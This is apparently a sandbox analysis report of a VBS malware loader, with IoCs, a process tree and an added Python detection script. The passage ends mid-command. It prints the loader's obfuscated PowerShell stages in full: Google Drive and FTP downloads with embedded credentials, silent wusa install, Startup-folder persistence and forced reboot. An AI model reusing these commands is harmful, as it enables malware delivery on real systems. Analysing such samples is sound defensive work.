Analysis
  max time kernel: 118s
  max time network: 135s
  platform: windows7_x64
  resource: win7-20240903-en
  resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  submitted: 02-11-2024 23:42
Static task: static1
Behavioral task: behavioral1
  Sample: demeOnay.vbs
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: demeOnay.vbs
  Resource: win10v2004-20241007-en
General
  Target: demeOnay.vbs
  Size: 586KB
  MD5: dbc2b2c1ad1e78348f9336869fbf0740
  SHA1: 7903a4142cb3c3e588710691a8577e5b7ee3c6c6
  SHA256: c27d49863e35526b0ff42b2799c27fcf72bd8f246e410ca83134dd26e7f54b0f
  SHA512: b4751bcaa288a9f0c74e7fac9bd7e9dc74422c71694300debdefebdc42bc077016bb07b2d928be4eb4d9cb16b18e744be35c82d2e2a53a7a0c290692772b94b2
  SSDEEP: 1536:coooooooooooooooooC99999999999999999999999999999999999999999999/:v3Jg6azbLal3Jg6azbLal3Jg6azbLaO
Malware Config
  Extracted URL (download prefix only; stage 2 appends a Google Drive file id chosen by processor architecture at runtime): https://drive.google.com/uc?export=download&id=
Signatures

Blocklisted process makes network request (2 IoCs)
  flow 5: pid 2836 powershell.exe
  flow 7: pid 2836 powershell.exe

Command and Scripting Interpreter: PowerShell (3 IoCs; heading recovered from the process-tree tags below)
  pid 2652 powershell.exe
  pid 2836 powershell.exe
  pid 2028 powershell.exe

Drops startup file (2 IoCs)
  File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demeOnay.vbs (powershell.exe)
  File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demeOnay.vbs (powershell.exe)

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)
  flow 4: drive.google.com
  flow 5: drive.google.com

Drops file in Windows directory (3 IoCs)
  File created: C:\Windows\wusa.lock (wusa.exe)
  File opened for modification: C:\Windows\Logs\DPX\setupact.log (wusa.exe)
  File opened for modification: C:\Windows\Logs\DPX\setuperr.log (wusa.exe)

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid 2652 powershell.exe
  pid 2836 powershell.exe
  pid 2280 powershell.exe
  pid 2028 powershell.exe

Suspicious use of AdjustPrivilegeToken (4 IoCs)
  Token: SeDebugPrivilege  pid 2652 powershell.exe
  Token: SeDebugPrivilege  pid 2836 powershell.exe
  Token: SeDebugPrivilege  pid 2280 powershell.exe
  Token: SeDebugPrivilege  pid 2028 powershell.exe

Suspicious use of WriteProcessMemory (15 IoCs; each pair recorded 3 times)
  source pid  source process   target pid  procid_target  count
  2196        WScript.exe      2652        30             3
  2652        powershell.exe   2836        32             3
  2836        powershell.exe   2280        33             3
  2280        powershell.exe   2252        34             3
  2836        powershell.exe   2028        35             3
  Every source/target pair is a parent/child edge of the process tree below (WScript.exe -> powershell.exe -> powershell.exe -> wusa.exe), so these are the writes that accompany process creation, not injection into an unrelated process.
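The signature list above reads as a set of detection opportunities: a script host (WScript.exe) launching powershell.exe with [char]/FromBase64String obfuscation, PowerShell relaunching itself to run wusa.exe, and a PowerShell write into the user's Startup folder. The Python below is an added example, not part of the sandbox output, that encodes those three links as rules and runs them over process and file events constructed from this report's own tree. The event field names (pid, ppid, image, cmdline, path) are my own rather than any sandbox schema, and the long command lines are abbreviated with "..." since the full text is on the page.

```python
"""Detection logic for the WScript.exe -> powershell.exe -> wusa.exe chain in this report.

Added example, not part of the sandbox output. EVENTS and FILE_EVENTS are constructed
from the process tree and the 'Drops startup file' IoC on this page; long command lines
are abbreviated with '...'. Field names are my own, not a sandbox schema.
"""
import re

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed from the report's process tree (pid, parent pid, image, command line).
EVENTS = [
    {"pid": 2196, "ppid": None, "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs"'},
    {"pid": 2652, "ppid": 2196, "image": PS,
     "cmdline": "powershell.exe -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQ...'; "
                "[System.Convert]::FromBase64String( $nqqkv ) ...; powershell $zmmdr"},
    {"pid": 2836, "ppid": 2652, "image": PS,
     "cmdline": 'powershell.exe "; $QDrfV = $host.Version.Major.Equals(2) ...; '
                'powershell.exe wusa.exe tkplB /quiet /norestart ; ..."'},
    {"pid": 2280, "ppid": 2836, "image": PS,
     "cmdline": "powershell.exe wusa.exe tkplB /quiet /norestart"},
    {"pid": 2252, "ppid": 2280, "image": r"C:\Windows\system32\wusa.exe",
     "cmdline": r'"C:\Windows\system32\wusa.exe" tkplB /quiet /norestart'},
    {"pid": 2028, "ppid": 2836, "image": PS,
     "cmdline": 'powershell.exe -command "sleep 180"'},
]
# Constructed from the 'Drops startup file' IoC (writer pid taken from the tree tags).
FILE_EVENTS = [
    {"pid": 2836, "op": "File created",
     "path": r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demeOnay.vbs"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Tokens the stage-1 loader needs: [char]NN splicing and a Base64 decode.
OBFUSCATION = re.compile(r"FromBase64String|\[char\]\d+")


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events, file_events):
    """Return (pid, rule) pairs; each rule is one link of the chain seen in this report."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        pname = image_name(parent["image"]) if parent else ""
        if name == "powershell.exe" and pname in SCRIPT_HOSTS and OBFUSCATION.search(e["cmdline"]):
            hits.append((e["pid"], "script host spawned obfuscated PowerShell"))
        if name == "powershell.exe" and pname == "powershell.exe" \
                and re.search(r"\bwusa\.exe\b", e["cmdline"], re.I):
            hits.append((e["pid"], "PowerShell invoking wusa.exe"))
        if name == "wusa.exe" and pname == "powershell.exe":
            hits.append((e["pid"], "wusa.exe launched from PowerShell"))
    for f in file_events:
        writer = by_pid.get(f["pid"])
        if writer and image_name(writer["image"]) == "powershell.exe" \
                and "\\start menu\\programs\\startup\\" in f["path"].lower():
            hits.append((f["pid"], "PowerShell wrote to Startup folder"))
    return hits


if __name__ == "__main__":
    for pid, rule in detect(EVENTS, FILE_EVENTS):
        print(pid, rule)
```

Run as-is it reports PIDs 2652, 2836, 2280, 2252 and the Startup write by 2836; the `sleep 180` child (2028) trips nothing on its own, which is the point of keying on parent/child pairs rather than on powershell.exe alone.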
Processes

Depth 1: C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs"
    - Suspicious use of WriteProcessMemory
    PID: 2196

Depth 2 (child of 2196): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, full command line as captured:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQARAAgAEQAJwAgACwAIA' + [char]66 + 'vAFQAUg' + [char]66 + 'oAFgAJAAgACwAIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'lAGwAZQ' + [char]66 + 'jAHQAag' + [char]66 + 'pAG0AaA' + [char]66 + 'lAG4AZA' + [char]66 + 'lAHIAcw' + [char]66 + 'vAG4ALg' + [char]66 + 'jAG8AbQAvAHoALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIA' + [char]66 + 'tAEcAcQ' + [char]66 + 'pAG4AJAAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACAARQ' + [char]66 + 'mAFgAcw' + [char]66 + 'nACQAIAArACAARw' + [char]66 + 'pAFQAeg' + [char]66 + 'KACQAIAAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACcASQ' + [char]66 + 'WAEYAcg' + [char]66 + 'wACcAIAA9ACAAbQ' + [char]66 + 'HAHEAaQ' + [char]66 + 'uACQAOwAnADEAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAIAA9ACAARQ' + [char]66 + 'mAFgAcw' + [char]66 + 'nACQAOwAnAC4AMw' + [char]66 + '5AHIAYQ' + [char]66 + 'yAGIAaQ' + [char]66 + 'MAHMAcw' + [char]66 + 'hAGwAQwAnACAAPQAgAEcAaQ' + [char]66 + 'UAHoASgAkADsAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIAA9ACAAbw' + [char]66 + 'UAFIAaA' + [char]66 + 'YACQAOwApACAAKQAnAEEAJwAsACcAkyE6AJMhJwAoAGUAYw' + [char]66 + 'hAGwAcA' + [char]66 + 'lAHIALg' + [char]66 + 'mAGIAcg' + [char]66 + 'zAG0AJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' 
+ [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AHMAWwAgAD0AIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACAAKQA4AEYAVA' + [char]66 + 'VACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAoACAAPQAgAGYAYg' + [char]66 + 'yAHMAbQAkADsAIAAgAH0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'zAHIAYQ' + [char]66 + 'QAGMAaQ' + [char]66 + 'zAGEAQg' + [char]66 + 'lAHMAVQAtACAAcQ' + [char]66 + '4AFQAYg' + [char]66 + 'vACQAIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAHQAdQ' + [char]66 + 'PAC0AIA' + [char]66 + '0AHAAaw' + [char]66 + 'mAHkAJAAgAEkAUg' + [char]66 + 'VAC0AIA' + [char]66 + '0AHMAZQ' + [char]66 + '1AHEAZQ' + [char]66 + 'SAGIAZQ' + [char]66 + 'XAC0AZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkAOwAgACkAIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGgAdA' + [char]66 + 'hAFAALQAgAHQAbg' + [char]66 + 'lAHQAbg' + [char]66 + 'vAEMALQ' + [char]66 + '0AGUARwAgACgAIAA9ACAAdA' + [char]66 + 'wAGsAZg' + [char]66 + '5ACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAKAAgAD0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJA' + [char]66 + '7ACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIAAxAC4AMAAuADAALgA3ADIAMQAgAGcAbg' + [char]66 + 'pAHAAOwAgAGMALwAgAGUAeA' + [char]66 + 'lAC4AZA' + [char]66 + 'tAGMAOw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'jACQAIA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 
'kAGUAcg' + [char]66 + 'DAC0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'zAHIAYQ' + [char]66 + 'QAGMAaQ' + [char]66 + 'zAGEAQg' + [char]66 + 'lAHMAVQAtACAAcQ' + [char]66 + '4AFQAYg' + [char]66 + 'vACQAIA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAHQAdQ' + [char]66 + 'PAC0AIA' + [char]66 + 'oAGYAZA' + [char]66 + 'wAG4AJAAgAEkAUg' + [char]66 + 'VAC0AIA' + [char]66 + '0AHMAZQ' + [char]66 + '1AHEAZQ' + [char]66 + 'SAGIAZQ' + [char]66 + 'XAC0AZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkAOwApACkAKQApACkAIAA0ADYALAA0ADYALAA2ADUALAA1ADUALAAzADUALAA5ADQALAA5ADgALAA3ADcALAA2ADYALAA1ADgALAAgADcAOQAsACAAMQAyADEALAAgADEANwAgACwAOQAxADEAIAAsADAANwAgACwANgA2ACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwAtACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'GAC0AIA' + [char]66 + '0AHgAZQ' + [char]66 + 'UAG4AaQ' + [char]66 + 'hAGwAUA' + [char]66 + 'zAEEALQAgAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGUAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC0Abw' + [char]66 + 'UAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMAKAAgACwAKQApADkANAAsADYAMQAxACwANwA5ACwANAAxADEALAA4ADkALAA4ADEAMQAsADcAMAAxACwAOQA5ACwANQAxADEALAAxADAAMQAsADAAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAKA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAFMAUAAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'jACQAOwApACcAdA' + [char]66 + '4AHQALgAxADAAbA' + [char]66 + 'sAGQAJwAgACsAIAApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAKAAgAD0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAA7ACkAIAAnAHQAeA' + [char]66 + 
'0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8AJwAgACsAIAAnAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8Acg' + [char]66 + 'iAC4AbQ' + [char]66 + 'vAGMALg' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC4AcA' + [char]66 + '0AGYAQAAxAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALwAvADoAcA' + [char]66 + '0AGYAJwAoACAAPQAgAGgAZg' + [char]66 + 'kAHAAbgAkADsAIAAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACAAfQ' + [char]66 + 'lAHUAcg' + [char]66 + '0ACQAewAgAD0AIA' + [char]66 + 'rAGMAYQ' + [char]66 + 'iAGwAbA' + [char]66 + 'hAEMAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAGQAaQ' + [char]66 + 'sAGEAVg' + [char]66 + 'lAHQAYQ' + [char]66 + 'jAGkAZg' + [char]66 + 'pAHQAcg' + [char]66 + 'lAEMAcg' + [char]66 + 'lAHYAcg' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWw' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ACAAZgAvACAAMAAgAHQALwAgAHIALwAgAGUAeA' + [char]66 + 'lAC4Abg' + [char]66 + '3AG8AZA' + [char]66 + '0AHUAaA' + [char]66 + 'zACAAOwAnADAAOAAxACAAcA' + [char]66 + 'lAGUAbA' + [char]66 + 'zACcAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 
'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAKQAgACcAcA' + [char]66 + '1AHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAbQ' + [char]66 + 'hAHIAZw' + [char]66 + 'vAHIAUA' + [char]66 + 'cAHUAbg' + [char]66 + 'lAE0AIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAHcAbw' + [char]66 + 'kAG4AaQ' + [char]66 + 'XAFwAdA' + [char]66 + 'mAG8Acw' + [char]66 + 'vAHIAYw' + [char]66 + 'pAE0AXA' + [char]66 + 'nAG4AaQ' + [char]66 + 'tAGEAbw' + [char]66 + 'SAFwAYQ' + [char]66 + '0AGEARA' + [char]66 + 'wAHAAQQ' + [char]66 + 'cACcAIAArACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAIAAoACAAbg' + [char]66 + 'vAGkAdA' + [char]66 + 'hAG4AaQ' + [char]66 + '0AHMAZQ' + [char]66 + 'EAC0AIAAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAG0AZQ' + [char]66 + '0AEkALQ' + [char]66 + '5AHAAbw' + [char]66 + 'DACAAOwAgAHQAcg' + [char]66 + 'hAHQAcw' + [char]66 + 'lAHIAbw' + [char]66 + 'uAC8AIA' + [char]66 + '0AGUAaQ' + [char]66 + '1AHEALwAgAEIAbA' + [char]66 + 'wAGsAdAAgAGUAeA' + [char]66 + 'lAC4AYQ' + [char]66 + 'zAHUAdwAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAAgADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAAPQAgAEIAbA' + [char]66 + 'wAGsAdAA7ACkAIA' + [char]66 + 'lAG0AYQ' + [char]66 + 'OAHIAZQ' + [char]66 + 'zAFUAOgA6AF0AdA' + [char]66 + 'uAGUAbQ' + [char]66 + 'uAG8Acg' + [char]66 + 'pAHYAbg' + [char]66 + 'FAFsAIAArACAAJw' + [char]66 + 'cAHMAcg' + [char]66 + 'lAHMAVQ' + [char]66 + 'cADoAQwAnACgAIAA9ACAAZg' + [char]66 + 'EAFkAYw' + [char]66 + 'tACQAOwApACAAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAoACAALA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJAAoAGUAbA' + [char]66 + 'pAEYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'EAC4Acw' + 
[char]66 + '4AHYAZA' + [char]66 + '5ACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHMAeA' + [char]66 + '2AGQAeQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHMAeA' + [char]66 + '2AGQAeQAkADsAfQA7ACAAKQAnAHQATw' + [char]66 + 'MAGMAXw' + [char]66 + 'LAGEAMw' + [char]66 + 'aAGYAbw' + [char]66 + 'YADIASg' + [char]66 + 'KAHIAVg' + [char]66 + 'oAG0AVgA5AGMAbQA5AFgAcw' + [char]66 + '1AFgAbQ' + [char]66 + 'qADEAZwAxACcAIAArACAAdw' + [char]66 + '3AHMAZw' + [char]66 + 'nACQAKAAgAD0AIA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJA' + [char]66 + '7ACAAZQ' + [char]66 + 'zAGwAZQ' + [char]66 + '9ADsAIAApACcAMgA0AHUAWA' + [char]66 + 'KAFQAcQ' + [char]66 + 'hAG0AZw' + [char]66 + '5AE0AdA' + [char]66 + 'GAHoAYQ' + [char]66 + 'rAFAAUgAxAHEAXw' + [char]66 + 'JAHYARw' + [char]66 + 'pAFgATg' + [char]66 + 'kAHEAYQ' + [char]66 + 'OADEAJwAgACsAIA' + [char]66 + '3AHcAcw' + [char]66 + 'nAGcAJAAoACAAPQAgAHcAdw' + [char]66 + 'zAGcAZwAkAHsAIAApACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAIAAoACAAZg' + [char]66 + 'pADsAIAApACcANAA2ACcAKA' + [char]66 + 'zAG4AaQ' + [char]66 + 'hAHQAbg' + [char]66 + 'vAEMALg' + [char]66 + 'FAFIAVQ' + [char]66 + 'UAEMARQ' + [char]66 + 'UAEkASA' + [char]66 + 'DAFIAQQ' + [char]66 + 'fAFIATw' + [char]66 + 'TAFMARQ' + [char]66 + 'DAE8AUg' + [char]66 + 'QADoAdg' + [char]66 + 'uAGUAJAAgAD0AIA' + [char]66 + 'EAFcAZw' + [char]66 + 'WAHEAJAA7ACcAPQ' + [char]66 + 'kAGkAJg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAGQAPQ' + [char]66 + '0AHIAbw' + [char]66 + 'wAHgAZQA/AGMAdQAvAG0Abw' + [char]66 + 'jAC4AZQ' + [char]66 + 'sAGcAbw' + [char]66 + 'vAGcALg' + [char]66 + 'lAHYAaQ' + [char]66 + 
'yAGQALwAvADoAcw' + [char]66 + 'wAHQAdA' + [char]66 + 'oACcAIAA9ACAAdw' + [char]66 + '3AHMAZw' + [char]66 + 'nACQAOwApACAAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAIAAoACAAbA' + [char]66 + 'lAGQAOwApACgAaA' + [char]66 + '0AGEAUA' + [char]66 + 'wAG0AZQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HADoAOg' + [char]66 + 'dAGgAdA' + [char]66 + 'hAFAALg' + [char]66 + 'PAEkALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAHUAbw' + [char]66 + 'XAFoAVAAkAHsAIAApACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAAoACAAZg' + [char]66 + 'pADsAIAApADIAKA' + [char]66 + 'zAGwAYQ' + [char]66 + '1AHEARQAuAHIAbw' + [char]66 + 'qAGEATQAuAG4Abw' + [char]66 + 'pAHMAcg' + [char]66 + 'lAFYALg' + [char]66 + '0AHMAbw' + [char]66 + 'oACQAIAA9ACAAVg' + [char]66 + 'mAHIARA' + [char]66 + 'RACQAIAA7AA==';$nqqkv = $qKKzc; ;$nqqkv = $qKKzc.replace('уЦϚ' , 'B') ;;$zmmdr = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nqqkv ) ); $zmmdr = $zmmdr[-1..-$zmmdr.Length] -join '';$zmmdr = $zmmdr.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs');powershell $zmmdr2⤵
    Stage 1: the -command argument concatenates a Base64 string with every 'B' spliced in as [char]66 (so the literal never contains that byte), Base64-decodes it as UTF-16LE, reverses the resulting text character by character ($zmmdr[-1..-$zmmdr.Length] -join ''), substitutes the script's own path for %XRqhI%, and passes the result to a child powershell.exe. The .replace('уЦϚ','B') step is a no-op on this sample because the placeholder never appears in the assembled string.
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2652

Depth 3 (child of 2652): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, full command line as captured:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$ggsww = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$ggsww = ($ggsww + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$ggsww = ($ggsww + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$ydvxs = (New-Object Net.WebClient);$ydvxs.Encoding = [System.Text.Encoding]::UTF8;$ydvxs.DownloadFile($ggsww, ($TZWou + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\demeOnay.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$npdfh = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$obTxq = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )))));Invoke-WebRequest -URI $npdfh -OutFile $obTxq -UseBasicParsing -Credential $credential;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$obTxq = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$yfkpt = ( Get-Content -Path $obTxq ) ;Invoke-WebRequest -URI $yfkpt -OutFile $obTxq -UseBasicParsing } ;$msrbf = (Get-Content -Path $obTxq -Encoding UTF8) ;[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $msrbf.replace('↓:↓','A') );$XhRTo = 
